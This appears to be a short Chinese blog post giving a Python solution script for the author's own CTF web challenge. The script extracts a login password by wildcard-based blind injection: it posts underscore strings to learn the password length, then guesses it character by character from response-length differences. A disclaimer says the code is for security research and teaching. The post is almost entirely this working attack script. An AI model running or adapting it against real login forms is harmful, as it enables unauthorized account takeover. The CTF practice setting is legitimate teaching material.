>
>
WEB3 注入脚本
_yu_
//闲的没事 拿自己出的题练练写脚本
#用法 python url/login.php
import requests
import string
import sys
url=sys.argv[1]
s=string.digits+string.ascii_letters
r1=requests.post(url,data={'username':'yu22x','password':'a'})
len_normal=len(r1.text)
#判断密码长度
def len_for_pass():
print('[*] 正在判断长度......\n')
for i in range(1,50):
data={'username':'yu22x',
'password':'_'*i}
r2=requests.post(url,data=data)
if(len(r2.text)!=len_normal):
print('[+] 密码长度为:'+str(i)+'位\n')
return i
break
#盲注密码
def sqli(lens):
print('[*] 正在猜测密码......\n')
password=''
for i in range(1,lens+1):
#print(i)
for j in s:
x=password+j
data={
'username':'yu22x',
'password':x+'_'*(32-i)
}
r3=requests.post(url,data=data)
if(len(r3.text)!=len_normal):
password=x
print('\r[+] 密码为:'+password, end='')
break
sqli(len_for_pass())免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论